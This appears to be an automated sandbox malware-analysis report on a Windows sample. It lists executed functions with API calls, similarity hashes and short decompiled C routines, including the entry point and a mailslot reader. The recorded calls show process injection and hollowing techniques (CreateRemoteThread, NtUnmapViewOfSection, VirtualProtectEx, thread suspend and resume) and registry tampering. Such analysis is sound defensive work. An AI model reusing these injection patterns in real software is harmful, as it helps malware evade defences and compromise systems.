  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
